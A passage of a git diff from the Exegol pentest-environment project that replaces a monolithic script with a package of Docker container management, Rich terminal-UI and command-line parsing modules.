header_style="bold blue", border_style="blue", box=box.SIMPLE) - table.add_column("Container tag") - table.add_column("State") - table.add_column("Image (repo/image:tag)") - table.add_column("Creation details") - for container in containers: - table.add_row(container[1], container[2], container[3], container[4]) - elif options.verbosity >= 1: - table = Table(show_header=True, header_style="bold blue", border_style="grey35", box=box.SQUARE) - table.add_column("Id") - table.add_column("Container tag") - table.add_column("State") - table.add_column("Image (repo/image:tag)") - table.add_column("Creation details") - table.add_column("Binds & mounts") - for container in containers: - table.add_row(container[0], container[1], container[2], container[3], container[4], container[5]) - console.print(table) - print() - - -def info(): - info_images() - info_containers() - - -def exec(): - # TODO merge some function with 'start' process - global LOOP_PREVENTION - len_images = len(client.images.list(IMAGE_NAME, filters={"dangling": False})) - if options.exec is None: - logger.error("No command supplied (use -e or --exec parameter)") - return - if not len_images == 0: - if LOOP_PREVENTION == "": - logger.success("{} Exegol images exist".format(len_images)) - if not options.containertag: - exegol_container_count = len(client.containers.list(all=True, filters={"name": "exegol-"})) - if exegol_container_count > 0: - select_containertag(LOCAL_GIT_BRANCH) - else: - # no container exists, let's set the containertag and we'll bypass the next condition - # and go directly to the else, i.e. the container creation - # default to local git branch or master if none - if not LOCAL_GIT_BRANCH: - options.containertag = "master" - else: - options.containertag = LOCAL_GIT_BRANCH - if container_exists(options.containertag): - if LOOP_PREVENTION == "" or LOOP_PREVENTION == "create": - logger.success("Container exists") - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - if LOOP_PREVENTION == "exec": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.success("Container is up") - container_analysis(container) - if was_created_with_gui(container): - logger.info("Running xhost command for display sharing") - exec_popen( - "xhost +local:{}".format( - client.api.inspect_container("exegol-" + options.containertag)["Config"][ - "Hostname" - ] - ) - ) - logger.info("Executing command on Exegol as daemon") - # Using 'zsh source /opt/.zsh_aliases; eval cmd' to interpret alias commands on a non-interactive shell - cmd = "zsh -c \"source /opt/.zsh_aliases; eval \'{}\'\"".format(options.exec.replace("\"", "\\\"").replace("\'", "\\\'")) - logger.debug(cmd) - container.exec_run(cmd, detach=True) - LOOP_PREVENTION = "exec" - else: - if LOOP_PREVENTION == "start": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Container is down") - logger.info("Starting the container") - exec_popen("docker start {}".format("exegol-" + options.containertag)) - LOOP_PREVENTION = "start" - exec() - else: - if LOOP_PREVENTION == "create": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Container does not exist") - info_images() - if LOCAL_GIT_BRANCH == "master": # TODO: fix this crap when I'll have branch names that are equal to docker tags - default_dockertag = "stable" - else: - default_dockertag = LOCAL_GIT_BRANCH - imagetag = input( - "{}[?]{} What image do you want the container to create to be based upon [default: {}]? ".format( - BOLD_BLUE, END, default_dockertag)) - if not imagetag: - imagetag = default_dockertag - if client.images.list(IMAGE_NAME + ":" + imagetag): - info_containers() - if options.containertag: - default_containertag = options.containertag - elif not container_exists(imagetag): - default_containertag = imagetag - else: - logger.error(f"Something's wrong. Please create a detailed issue with everything you did and are trying to do (https://github.com/ShutdownRepo/Exegol/issues)") - # When running start without supplying a container tag, there are multiple scenarios - # 1. if >= 1 container(s) exist(s), one will be chosen to start - # 2. else, a container is created, either using a supplied tag or using the imagetag - # The user shouldn't end up here. - client.containers.list(all=True, filters={"name": "exegol-"}) - containertag = input( - "{}[?]{} What unique tag do you want to name your container with (one not in list above) [default: {}]? ".format( - BOLD_BLUE, END, default_containertag)) - if containertag == "": - containertag = default_containertag - options.containertag = containertag - logger.info("Creating the container") - logger.debug("{} container based on the {} image".format("exegol-" + containertag, - IMAGE_NAME + ":" + imagetag)) - base_options, advanced_options = container_creation_options(options.containertag) - exec_popen("docker create {} {} {}:{}".format(base_options, advanced_options, IMAGE_NAME, imagetag)) - LOOP_PREVENTION = "create" - exec() - else: - logger.warning("Image {} does not exist. You must supply a tag from the list above.".format( - IMAGE_NAME + ":" + imagetag)) - else: - if LOOP_PREVENTION == "install": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Exegol image does not exist, you must install it first") - confirmation = input( - "{}[?]{} Do you wish to install it now (↓ ~6GB)? [y/N] ".format( - BOLD_ORANGE, END - ) - ) - if confirmation == "y" or confirmation == "yes" or confirmation == "Y": - install() - LOOP_PREVENTION = "install" - exec() - - -def version(): - logger.info(f"You are running version {VERSION}") - -if __name__ == "__main__": - BOLD_GREEN = "\033[1;32m" - BOLD_BLUE = "\033[1;34m" - BOLD_WHITE = "\033[1;37m" - BOLD_RED = "\033[1;31m" - BOLD_ORANGE = "\033[1;93m" - END = "\033[0m" - BLUE = "\033[0;34m" - GREEN = "\033[0;32m" - YELLOW = "\033[0;33m" - RED = "\033[0;31m" - - IMAGE_NAME = "nwodtuhs/exegol" - EXEGOL_PATH = os.path.dirname(os.path.realpath(__file__)) - SHARED_DATA_VOLUMES = EXEGOL_PATH + "/shared-data-volumes" - SHARED_RESOURCES = EXEGOL_PATH + "/shared-resources" - - options = get_options() - logger = Logger(options.verbosity, options.quiet) - console = Console() - - if not options.verify: - requests.packages.urllib3.disable_warnings() - logger.verbose("Disabling warnings of insecure connection for invalid certificates") - requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' - logger.debug("Allowing the use of deprecated and weak cipher methods") - try: - requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' - except AttributeError: - pass - - try: - client = docker.from_env() - except docker.errors.DockerException as e: - if "ConnectionRefusedError" in str(e): - logger.error("Connection to docker service API refused (your docker service is probably down)") - elif "PermissionError" in str(e): - logger.error("Connection to docker service API not allowed (you probably need higher privileges to run " - "docker, try to use sudo or to add your user to the 'docker' group)") - else: - logger.error(f"Some error occurred while calling the docker service API: {e}") - exit(0) - except Exception as e: - logger.error(f"Some error occurred while calling the docker service API: {e}") - - # get working git branch - LOCAL_GIT_BRANCH = \ - subprocess.Popen(f"git -C {EXEGOL_PATH} symbolic-ref --short -q HEAD".split(), stdout=subprocess.PIPE, - stderr=subprocess.PIPE).communicate()[0].decode("utf-8").strip() - if not LOCAL_GIT_BRANCH: - logger.debug("No local git branch or error when fetching it, defaulting to 'master'") - LOCAL_GIT_BRANCH = "master" - else: - logger.debug("Local git branch: {}".format(LOCAL_GIT_BRANCH)) - - EXEGOL_PATH = os.path.dirname(os.path.realpath(__file__)) - - LOOP_PREVENTION = "" - globals()[options.action]() +if __name__ == '__main__': + main() diff --git a/exegol/__init__.py b/exegol/__init__.py new file mode 100644 index 00000000..75368052 --- /dev/null +++ b/exegol/__init__.py @@ -0,0 +1,4 @@ +from exegol.utils.ConstantConfig import ConstantConfig + +__version__ = ConstantConfig.version +__title__ = "exegol" diff --git a/exegol/__main__.py b/exegol/__main__.py new file mode 100644 index 00000000..8850fa23 --- /dev/null +++ b/exegol/__main__.py @@ -0,0 +1,9 @@ +try: + from exegol.manager.ExegolController import main +except ModuleNotFoundError as e: + print("Mandatory dependencies are missing:", e) + print("Please install them with pip3 install -r requirements.txt") + exit(1) + +if __name__ == "__main__": + main() diff --git a/exegol/console/ConsoleFormat.py b/exegol/console/ConsoleFormat.py new file mode 100644 index 00000000..27133f23 --- /dev/null +++ b/exegol/console/ConsoleFormat.py @@ -0,0 +1,18 @@ +from typing import Tuple, Union + + +# Generic text generation functions + +def boolFormatter(val: bool) -> str: + """Generic text formatter for bool value""" + return '[green]On :heavy_check_mark:[/green] ' if val else '[orange3]Off :axe:[/orange3]' + + +def getColor(val: Union[bool, int, str]) -> Tuple[str, str]: + """Generic text color getter for bool value""" + if type(val) is str: + try: + val = int(val) + except ValueError: + val = False + return ('[green]', '[/green]') if val else ('[orange3]', '[/orange3]') diff --git a/exegol/console/ExegolProgress.py b/exegol/console/ExegolProgress.py new file mode 100644 index 00000000..d4f46921 --- /dev/null +++ b/exegol/console/ExegolProgress.py @@ -0,0 +1,19 @@ +from typing import cast + +from rich.progress import Progress, Task, TaskID + + +class ExegolProgress(Progress): + """Addition of a practical function to Rich Progress""" + + def getTask(self, task_id: TaskID) -> Task: + """Return a specific task from task_id without error""" + task = self._tasks.get(task_id) + if task is None: + # If task doesn't exist, raise IndexError exception + raise IndexError + return cast(Task, task) + + def __enter__(self) -> "ExegolProgress": + super(ExegolProgress, self).__enter__() + return self diff --git a/exegol/console/ExegolPrompt.py b/exegol/console/ExegolPrompt.py new file mode 100644 index 00000000..c7c4fa8f --- /dev/null +++ b/exegol/console/ExegolPrompt.py @@ -0,0 +1,12 @@ +import rich.prompt + + +def Confirm(question: str, default: bool) -> bool: + """Quick function to format rich Confirmation and options on every exegol interaction""" + default_text = "[bright_magenta][Y/n][/bright_magenta]" if default else "[bright_magenta]\[y/N][/bright_magenta]" + formatted_question = f"[bold blue][?][/bold blue] {question} {default_text}" + return rich.prompt.Confirm.ask( + formatted_question, + show_choices=False, + show_default=False, + default=default) diff --git a/exegol/console/LayerTextColumn.py b/exegol/console/LayerTextColumn.py new file mode 100644 index 00000000..d2fdffe3 --- /dev/null +++ b/exegol/console/LayerTextColumn.py @@ -0,0 +1,44 @@ +import os +from typing import Optional + +from rich.console import JustifyMethod +from rich.highlighter import Highlighter +from rich.progress import TextColumn, Task, DownloadColumn +from rich.style import StyleType +from rich.table import Column +from rich.text import Text + +from exegol.utils.ExeLog import logger + + +class LayerTextColumn(TextColumn, DownloadColumn): + """Merging two Rich class to obtain a double behavior in the same RichTable""" + + def __init__(self, + text_format: str, + layer_key: str, + style: StyleType = "none", + justify: JustifyMethod = "left", + markup: bool = True, + highlighter: Optional[Highlighter] = None, + table_column: Optional[Column] = None, + binary_units: bool = False + ) -> None: + # Custom field + self.__data_key = layer_key + # Inheritance configuration + try: + TextColumn.__init__(self, text_format, style, justify, markup, highlighter, table_column) + except TypeError: + logger.critical(f"Your version of Rich does not correspond to the project requirements. Please update your dependencies with pip:{os.linesep}" + f"[bright_magenta]python3 -m pip install --user --requirement requirements.txt[/bright_magenta]") + DownloadColumn.__init__(self, binary_units, table_column) + + def render(self, task: "Task") -> Text: + """Custom render depending on the existence of data with data_key""" + if task.fields.get(self.__data_key) is None: + # Default render with classic Text render + return TextColumn.render(self, task) + else: + # If the task download a file, render the Download progress view + return DownloadColumn.render(self, task) diff --git a/exegol/console/TUI.py b/exegol/console/TUI.py new file mode 100644 index 00000000..72c1d0e7 --- /dev/null +++ b/exegol/console/TUI.py @@ -0,0 +1,417 @@ +import os +import re +from typing import Union, Optional, List, Dict, Type, Generator, Set, cast, Sequence, Tuple + +from rich import box +from rich.progress import TextColumn, BarColumn, TransferSpeedColumn, TimeElapsedColumn, TimeRemainingColumn, TaskID +from rich.prompt import Prompt +from rich.table import Table + +from exegol.console.ConsoleFormat import boolFormatter, getColor +from exegol.console.ExegolProgress import ExegolProgress +from exegol.console.ExegolPrompt import Confirm +from exegol.console.LayerTextColumn import LayerTextColumn +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.model.ExegolContainer import ExegolContainer +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.ExeLog import logger, console, ExeLog + + +class ExegolTUI: + """Class gathering different methods of Terminal User Interface (or TUI)""" + + @staticmethod + def downloadDockerLayer(stream: Generator, quick_exit: bool = False): + """Rich interface for docker image layer download from SDK stream""" + layers: Set[str] = set() + layers_downloaded: Set[str] = set() + layers_extracted: Set[str] = set() + downloading: Dict[str, TaskID] = {} + extracting: Dict[str, TaskID] = {} + # Create progress bar with columns + with ExegolProgress(TextColumn("{task.description}", justify="left"), + BarColumn(bar_width=None), + "[progress.percentage]{task.percentage:>3.1f}%", + "•", + LayerTextColumn("[bold]{task.completed}/{task.total}", "layer"), + "•", + TransferSpeedColumn(), + "•", + TimeElapsedColumn(), + "•", + TimeRemainingColumn(), + transient=True) as progress: + task_layers_download = progress.add_task("[bold red]Downloading layers...", total=0) + task_layers_extract = progress.add_task("[bold gold1]Extracting layers...", total=0, start=False) + for line in stream: # Receiving stream from docker API + status = line.get("status", '') + error = line.get("error", '') + layer_id = line.get("id") + if error != "": + logger.error(f"Docker download error: {error}") + logger.critical(f"An error occurred during the image download. Exiting.") + if status == "Pulling fs layer": # Identify new layer to download + layers.add(layer_id) + progress.update(task_layers_download, total=len(layers)) + progress.update(task_layers_extract, total=len(layers)) + elif "Pulling from " in status: # Rename task with image name + progress.getTask(task_layers_download).description = \ + f"[bold red]Downloading {status.replace('Pulling from ', '')}:{line.get('id', 'latest')}" + progress.getTask(task_layers_extract).description = \ + f"[bold gold1]Extracting {status.replace('Pulling from ', '')}:{line.get('id', 'latest')}" + elif status == "Download complete" or status == "Pull complete": # Mark task as complete and remove it from the pool + # Select task / layer pool depending on the status + task_pool = downloading + layer_pool = layers_downloaded + if status == "Pull complete": + task_pool = extracting + layer_pool = layers_extracted + # Tagging current layer as ended + layer_pool.add(layer_id) + # Remove finished layer progress bar + layer_task = task_pool.get(layer_id) + if layer_task is not None: + progress.remove_task(layer_task) # Remove progress bar + task_pool.pop(layer_id) # Remove task from pool + # Update global task completion status + progress.update(task_layers_download, completed=len(layers_downloaded)) + progress.update(task_layers_extract, completed=len(layers_extracted)) + elif status == "Downloading" or status == "Extracting": # Handle download or extract progress + task_pool = downloading + if status == "Extracting": + task_pool = extracting + if not progress.getTask(task_layers_extract).started: + progress.start_task(task_layers_extract) + task_id = task_pool.get(layer_id) + progressDetail = line.get("progressDetail", {}) + if task_id is None: # If this is a new layer, create a new task accordingly + task_id = progress.add_task( + f"[{'blue' if status == 'Downloading' else 'magenta'}]{status} {layer_id}", + total=progressDetail.get("total", 100), + layer=layer_id) + task_pool[layer_id] = task_id + # Updating task progress + progress.update(task_id, completed=progressDetail.get("current", 100)) + if status == "Extracting" and progressDetail.get("current", 0) == progressDetail.get("total", 100): + progress.update(task_id, description=f"[green]Checksum {layer_id} ...") + elif "Image is up to date" in status or "Status: Downloaded newer image for" in status: + logger.success(status) + if quick_exit: + break + else: + logger.debug(line) + + @staticmethod + def buildDockerImage(build_stream: Generator): + """Rich interface for docker image building from SDK stream""" + # Prepare log file + logfile = None + if ParametersManager().build_log is not None: + # Opening log file in line buffering mode (1) to support tail -f [file] + logfile = open(ParametersManager().build_log, 'a', buffering=1) + # Follow stream + for line in build_stream: + stream_text = line.get("stream", '') + error_text = line.get("error", '') + if logfile is not None: + logfile.write(stream_text) + logfile.write(error_text) + if error_text != "": + logger.error(f"Docker build error: {error_text}") + logger.critical( + f"An error occurred during the image build (code: {line.get('errorDetail', {}).get('code', '?')}). Exiting.") + if stream_text.strip() != '': + if "Step" in stream_text: + logger.info(stream_text.rstrip()) + elif "--->" in stream_text or \ + "Removing intermediate container " in stream_text or \ + re.match(r"Successfully built [a-z0-9]{12}", stream_text) or \ + re.match(r"^Successfully tagged ", stream_text): + logger.verbose(stream_text.rstrip()) + else: + logger.raw(stream_text, level=ExeLog.ADVANCED) + if ': FROM ' in stream_text: + logger.info("Downloading docker image") + ExegolTUI.downloadDockerLayer(build_stream, quick_exit=True) + if logfile is not None: + logfile.close() + + @staticmethod + def printTable(data: Union[Sequence[SelectableInterface], Sequence[str], Sequence[Dict[str, str]]], title: Optional[str] = None): + """Printing Rich table for a list of object""" + logger.empty_line() + table = Table(title=title, show_header=True, header_style="bold blue", border_style="grey35", + box=box.SQUARE, title_justify="left") + if len(data) == 0: + logger.debug("No data supplied") + return + else: + if type(data[0]) is ExegolImage: + ExegolTUI.__buildImageTable(table, cast(Sequence[ExegolImage], data)) + elif type(data[0]) is ExegolContainer: + ExegolTUI.__buildContainerTable(table, cast(Sequence[ExegolContainer], data)) + elif type(data[0]) is str: + if title is not None: + ExegolTUI.__buildStringTable(table, cast(Sequence[str], data), cast(str, title)) + else: + ExegolTUI.__buildStringTable(table, cast(Sequence[str], data)) + elif type(data[0]) is dict: + ExegolTUI.__buildDictTable(table, cast(Sequence[Dict[str, str]], data)) + else: + logger.error(f"Print table of {type(data[0])} is not implemented") + raise NotImplementedError + console.print(table) + logger.empty_line() + + @staticmethod + def __buildImageTable(table: Table, data: Sequence[ExegolImage]): + """Building Rich table from a list of ExegolImage""" + table.title = "[not italic]:flying_saucer: [/not italic][gold3][g]Available images[/g][/gold3]" + # Define columns + verbose_mode = logger.isEnabledFor(ExeLog.VERBOSE) + debug_mode = logger.isEnabledFor(ExeLog.ADVANCED) + if verbose_mode: + table.add_column("Id") + table.add_column("Image tag") + if verbose_mode: + table.add_column("Download size") + table.add_column("Size on disk") + table.add_column("Build date (UTC)") + else: + # Depending on whether the image has already been downloaded or not, + # it will show the download size or the size on disk + table.add_column("Size") + table.add_column("Status") + # Load data into the table + for image in data: + # ToBeRemoved images are only shown in verbose mode + if image.isLocked() and not verbose_mode: + continue + if verbose_mode: + table.add_row(image.getLocalId(), image.getDisplayName(), image.getDownloadSize(), + image.getRealSize(), image.getBuildDate(), image.getStatus()) + else: + table.add_row(image.getDisplayName(), image.getSize(), image.getStatus()) + + @staticmethod + def __buildContainerTable(table: Table, data: Sequence[ExegolContainer]): + """Building Rich table from a list of ExegolContainer""" + table.title = "[not italic]:alien: [/not italic][gold3][g]Available containers[/g][/gold3]" + # Define columns + verbose_mode = logger.isEnabledFor(ExeLog.VERBOSE) + debug_mode = logger.isEnabledFor(ExeLog.ADVANCED) + if verbose_mode: + table.add_column("Id") + table.add_column("Container tag") + table.add_column("State") + table.add_column("Image tag") + table.add_column("Configurations") + if verbose_mode: + table.add_column("Mounts") + table.add_column("Devices") + table.add_column("Envs") + # Load data into the table + for container in data: + if verbose_mode: + table.add_row(container.getId(), container.name, container.getTextStatus(), container.image.getDisplayName(), + container.config.getTextFeatures(verbose_mode), + container.config.getTextMounts(debug_mode), + container.config.getTextDevices(debug_mode), container.config.getTextEnvs(debug_mode)) + else: + table.add_row(container.name, container.getTextStatus(), container.image.getDisplayName(), + container.config.getTextFeatures(verbose_mode)) + + @staticmethod + def __buildStringTable(table: Table, data: Sequence[str], title: str = "Key"): + """Building a simple Rich table from a list of string""" + table.title = title + # Define columns + table.add_column(title) + table.show_header = False + # Load data into the table + for string in data: + table.add_row(string) + + @staticmethod + def __buildDictTable(table: Table, data_array: Sequence[Dict[str, str]]): + """Building a simple Rich table from a list of string""" + # Define columns from dict keys + for column in data_array[0].keys(): + table.add_column(column.capitalize()) + # Load data into the table + for data in data_array: + # Array is directly pass as *args to handle dynamic columns number + table.add_row(*data.values()) + + @classmethod + def selectFromTable(cls, + data: Sequence[SelectableInterface], + object_type: Optional[Type] = None, + default: Optional[str] = None, + allow_None: bool = False) -> Union[SelectableInterface, str]: + """Return an object (implementing SelectableInterface) selected by the user + Return a str when allow_none is true and no object have been selected + Raise IndexError of the data list is empty.""" + cls.__isInteractionAllowed() + # Check if there is at least one object in the list + if len(data) == 0: + if object_type is ExegolImage: + logger.warning("No images are installed") + elif object_type is ExegolContainer: + logger.warning("No containers have been created yet") + else: + # Using container syntax by default + logger.warning("No containers have been created yet") + raise IndexError + object_type = type(data[0]) + object_name = "container" if object_type is ExegolContainer else "image" + action = "create" if object_type is ExegolContainer else "build" + # Print data list + cls.printTable(data) + # Get a list of every choice available + choices: Optional[List[str]] = [obj.getKey() for obj in data] + # If no default have been supplied, using the first one + if default is None: + default = cast(List[str], choices)[0] + # When allow_none is enable, disabling choices restriction + if allow_None: + choices = None + logger.info( + f"You can use a name that does not already exist to {action} a new {object_name}" + f"{' from local sources' if object_type is ExegolImage else ''}") + while True: + choice = Prompt.ask( + f"[bold blue][?][/bold blue] Select {'an' if object_type is ExegolImage else 'a'} {object_name} by its name", + default=default, choices=choices, + show_choices=False) + for o in data: + if choice == o: + return o + if allow_None: + if Confirm( + f"No {object_name} is available under this name, do you want to {action} it?", + default=True): + return choice + logger.info(f"[red]Please select one of the available {object_name}s[/red]") + else: + logger.critical(f"Unknown error, cannot fetch selected object.") + + @classmethod + def multipleSelectFromTable(cls, + data: Sequence[SelectableInterface], + object_type: Type = None, + default: Optional[str] = None) -> Sequence[SelectableInterface]: + """Return a list of object (implementing SelectableInterface) selected by the user + Raise IndexError of the data list is empty.""" + cls.__isInteractionAllowed() + result = [] + pool = cast(List[SelectableInterface], data).copy() + if object_type is None and len(pool) > 0: + object_type = type(pool[0]) + if object_type is ExegolContainer: + object_subject = "container" + elif object_type is ExegolImage: + object_subject = "image" + else: + object_subject = "object" + while True: + selected = cast(SelectableInterface, cls.selectFromTable(pool, object_type, default)) + result.append(selected) + pool.remove(selected) + if len(pool) == 0: + return result + elif not Confirm(f"Do you want to select another {object_subject}?", default=False): + return result + + @classmethod + def selectFromList(cls, + data: Union[Dict[str, str], List[str]], + subject: str = "an option", + title: str = "Options", + default: Optional[str] = None) -> Union[str, Tuple[str, str]]: + """if data is list(str): Return a string selected by the user + if data is dict: list keys and return a tuple of the selected key corresponding value + Raise IndexError of the data list is empty.""" + cls.__isInteractionAllowed() + if len(data) == 0: + logger.warning("No options were found") + raise IndexError + if type(data) is dict: + submit_data = list(data.keys()) + else: + submit_data = cast(List[str], data) + cls.printTable(submit_data, title=title) + if default is None: + default = submit_data[0] + choice = Prompt.ask(f"[bold blue][?][/bold blue] Select {subject}", default=default, choices=submit_data, + show_choices=False) + if type(data) is dict: + return choice, data[choice] + else: + return choice + + @classmethod + def printContainerRecap(cls, container: ExegolContainerTemplate): + # Fetch data + devices = container.config.getTextDevices(logger.isEnabledFor(ExeLog.VERBOSE)) + envs = container.config.getTextEnvs(logger.isEnabledFor(ExeLog.VERBOSE)) + sysctls = container.config.getSysctls() + capabilities = container.config.getCapabilities() + volumes = container.config.getTextMounts(logger.isEnabledFor(ExeLog.VERBOSE)) + + # Color code + privilege_color = "bright_magenta" + path_color = "magenta" + + logger.empty_line() + recap = Table(border_style="grey35", box=box.SQUARE, title_justify="left", show_header=True) + recap.title = "[not italic]:white_medium_star: [/not italic][gold3][g]Container summary[/g][/gold3]" + # Header + recap.add_column(f"[bold blue]Name[/bold blue]{os.linesep}[bold blue]Image[/bold blue]", justify="right") + container_info_header = f"{container.name}{os.linesep}{container.image.getName()}" + if "N/A" not in container.image.getImageVersion(): + container_info_header += f" - v.{container.image.getImageVersion()}" + if "Unknown" not in container.image.getStatus(): + container_info_header += f" ({container.image.getStatus(include_version=False)})" + recap.add_column(container_info_header) + # Main features + recap.add_row("[bold blue]GUI[/bold blue]", boolFormatter(container.config.isGUIEnable())) + recap.add_row("[bold blue]Network[/bold blue]", container.config.getNetworkMode()) + recap.add_row("[bold blue]Timezone[/bold blue]", boolFormatter(container.config.isTimezoneShared())) + recap.add_row("[bold blue]Exegol resources[/bold blue]", boolFormatter(container.config.isExegolResourcesEnable()) + + f"{'[bright_black](/opt/resources)[/bright_black]' if container.config.isExegolResourcesEnable() else ''}") + recap.add_row("[bold blue]My resources[/bold blue]", boolFormatter(container.config.isSharedResourcesEnable()) + + f"{'[bright_black](/my-resources)[/bright_black]' if container.config.isSharedResourcesEnable() else ''}") + recap.add_row("[bold blue]VPN[/bold blue]", container.config.getVpnName()) + if container.config.getPrivileged() is True: + recap.add_row("[bold blue]Privileged[/bold blue]", '[orange3]On :fire:[/orange3]') + else: + recap.add_row("[bold blue]Privileged[/bold blue]", "[green]Off :heavy_check_mark:[/green]") + if len(capabilities) > 0: + recap.add_row(f"[bold blue]Capabilities[/bold blue]", + f"[{privilege_color}]{', '.join(capabilities)}[/{privilege_color}]") + if container.config.isWorkspaceCustom(): + recap.add_row("[bold blue]Workspace[/bold blue]", + f'[{path_color}]{container.config.getHostWorkspacePath()}[/{path_color}] [bright_black](/workspace)[/bright_black]') + else: + recap.add_row("[bold blue]Workspace[/bold blue]", '[bright_magenta]Dedicated[/bright_magenta] [bright_black](/workspace)[/bright_black]') + if len(devices) > 0: + recap.add_row("[bold blue]Devices[/bold blue]", devices.strip()) + if len(envs) > 0: + recap.add_row("[bold blue]Envs[/bold blue]", envs.strip()) + if len(volumes) > 0: + recap.add_row("[bold blue]Volumes[/bold blue]", volumes.strip()) + if len(sysctls) > 0: + recap.add_row("[bold blue]Systctls[/bold blue]", os.linesep.join( + [f"[{privilege_color}]{key}[/{privilege_color}] = {getColor(value)[0]}{value}{getColor(value)[1]}" for + key, value in sysctls.items()])) + console.print(recap) + logger.empty_line() + + @classmethod + def __isInteractionAllowed(cls): + # if not ParametersManager().interactive_mode: # TODO improve non-interactive mode + # logger.critical(f'A required information is missing. Exiting.') + pass diff --git a/exegol/console/__init__.py b/exegol/console/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/console/cli/ParametersManager.py b/exegol/console/cli/ParametersManager.py new file mode 100644 index 00000000..a4b38f4d --- /dev/null +++ b/exegol/console/cli/ParametersManager.py @@ -0,0 +1,55 @@ +from argparse import Namespace +from typing import List, Any + +from exegol.console.cli.actions.Command import Command +from exegol.utils.ExeLog import logger +from exegol.utils.MetaSingleton import MetaSingleton +from exegol.utils.argParse import Parser + + +class ParametersManager(metaclass=MetaSingleton): + """This class is a singleton allowing to access from anywhere to any parameter + filled by the user from the CLI arguments""" + + def __init__(self): + # List every action available on the project (from the root Class) + actions: List[Command] = [cls() for cls in Command.__subclasses__()] + # Load & execute argparse + parser: Parser = Parser(actions) + parsing_results = parser.run_parser() + # The user arguments resulting from the parsing will be stored in parameters + self.parameters: Command = self.__loadResults(parser, parsing_results) + + @staticmethod + def __loadResults(parser: Parser, parsing_results: Namespace) -> Command: + """The result of argparse is sent to the action object to replace the parser with the parsed values""" + try: + action: Command = parsing_results.action + action.populate(parsing_results) + return action + except AttributeError: + # Catch missing "action" parameter en CLI + parser.print_help() + exit(0) + + def getCurrentAction(self) -> Command: + """Return the object corresponding to the action selected by the user""" + return self.parameters + + def __getattr__(self, item: str) -> Any: + """The getattr function is overloaded to transparently pass the parameter search + in the child object of Command stored in the 'parameters' attribute""" + try: + # The priority is to first return the attributes of the current object + # Using the object generic method to avoid infinite loop to itself + return object.__getattribute__(self, item) + except AttributeError: + # If parameters is called before initialisation (from the next statement), this can create an infinite loop + if item == "parameters": + return None + try: + # If item was not found in self, the search is initiated among the parameters + return getattr(self.parameters, item) + except AttributeError: + # The logger may not work if the call is made before its initialization + logger.debug(f"Attribute not found in parameters: {item}") diff --git a/exegol/console/cli/__init__.py b/exegol/console/cli/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/console/cli/actions/Command.py b/exegol/console/cli/actions/Command.py new file mode 100644 index 00000000..f39ebf05 --- /dev/null +++ b/exegol/console/cli/actions/Command.py @@ -0,0 +1,142 @@ +import os +import re +from argparse import Namespace +from typing import List, Optional, Tuple, Union, Dict, cast + +from exegol.utils.ExeLog import logger + + +class Option: + """This object allows to define and configure an argparse parameter""" + + def __init__(self, *args, dest: Optional[str] = None, **kwargs): + """Generic class to handle Key:Value object directly from the constructor""" + # Set arguments to the object to save every setting, these values will be sent to the argparser + self.args = args + self.kwargs = kwargs + if dest is not None: + self.kwargs["dest"] = dest + self.dest = dest + + def __repr__(self) -> str: + """This overload allows to format the name of the object. + Mainly used by developers to easily identify objects""" + return f"Option: {str(self.dest) if self.dest is not None else self.kwargs.get('metavar', 'Option not found')}" + + +class GroupArg: + """This object allows you to group a set of options within the same group""" + + def __init__(self, *options, title: Optional[str] = None, description: Optional[str] = None, + is_global: bool = False): + self.title = title + self.description = description + self.options: Tuple[Dict[str, Union[Option, bool]]] = cast(Tuple[Dict[str, Union[Option, bool]]], options) + self.is_global = is_global + + def __repr__(self) -> str: + """This overload allows to format the name of the object. + Mainly used by developers to easily identify objects""" + return f"GroupArg: {self.title}" + + +class Command: + """The Command class is the root of all CLI actions""" + + def __init__(self): + # Root command usages (can be overwritten by subclasses to display different use cases) + self._pre_usages = "[underline]To see specific examples run:[/underline][italic] exegol [cyan]command[/cyan] -h[/italic]" + self._usages = { + "Install (or build) (↓ ~25GB max)": "exegol install", + "Open an exegol shell": "exegol start", + "Show exegol images & containers": "exegol info", + "Update an image": "exegol update", + "See commands examples to execute": "exegol exec -h", + "Remove a container": "exegol remove", + "Uninstall an image": "exegol uninstall", + "Stop a container": "exegol stop" + } + self._post_usages = "" + + # Name of the object + self.name = type(self).__name__.lower() + # Global parameters + self.verify = Option("-k", "--insecure", + dest="verify", + action="store_false", + default=True, + required=False, + help="Allow insecure server connections for web requests, " + "e.g. when fetching info from DockerHub " + "(default: [red not italic]False[/red not italic])") + self.quiet = Option("-q", "--quiet", + dest="quiet", + action="store_true", + default=False, + help="Show no information at all") + self.verbosity = Option("-v", "--verbose", + dest="verbosity", + action="count", + default=0, + help="Verbosity level (-v for verbose, -vv for advanced, -vvv for debug)") + # TODO review non-interactive mode + #self.interactive_mode = Option("--non-interactive", + # dest="interactive_mode", + # action="store_false", + # help="[red](WIP)[/red] Prevents Exegol from interactively requesting information. " + # "If critical information is missing, an error will be raised.") + + # Main global group of argparse + self.groupArgs = [ + GroupArg({"arg": self.verify, "required": False}, + {"arg": self.quiet, "required": False}, + #{"arg": self.interactive_mode, "required": False}, + {"arg": self.verbosity, "required": False}, + title="[blue]Optional arguments[/blue]", + is_global=True) + ] + + def __call__(self, *args, **kwargs): + """This method is called by the main controller (ExegolController) + to get the function, execute it and launch the action. + This method must be overloaded in all child classes to ensure the correct execution of the thread""" + logger.debug("The called command is : ", self.name) + logger.debug("the object is", type(self).__name__) + raise NotImplementedError + + def __repr__(self) -> str: + """This overload allows to format the name of the object. + Mainly used by developers to easily identify objects""" + return self.name + + def populate(self, args: Namespace): + 